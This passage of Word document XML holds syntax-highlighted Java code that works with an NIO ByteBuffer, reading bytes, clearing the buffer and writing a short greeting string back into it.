                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>while</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>byteBuffer</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.hasRemaining()) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00193184" w:rsidRPr="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>byte</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>c</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>byteBuffer</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.get();</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00193184" w:rsidRPr="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>System.</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="0000C0"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>out</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.println(</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>c</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00193184" w:rsidRPr="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00193184" w:rsidRPr="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">//The position is set to zero, the limit is set to the capacity, and the mark is discarded. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00193184" w:rsidRPr="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>byteBuffer</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.clear();</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00193184" w:rsidRPr="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w:rsidR="00193184" w:rsidRPr="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">String </w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>response</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="2A00FF"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>"you are my friends!"</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00193184" w:rsidRPr="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>byte</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> [] </w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>bytes</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>response</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.getBytes();</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00193184" w:rsidRPr="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>byteBuffer</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.put(</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>bytes</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00193184" w:rsidRPr="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>while</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>byteBuffer</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.hasRemaining()) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00193184" w:rsidRPr="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>byteBuffer</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.flip();</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00193184" w:rsidRPr="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>byte</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> []</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>dst</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>new</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>byte</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>byteBuffer</w:t>
            </w:r>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">.remaining()]; </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00193184" w:rsidRPr="00193184" w:rsidRDefault="00193184" w:rsidP="00193184">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00193184">
              <w:rPr>
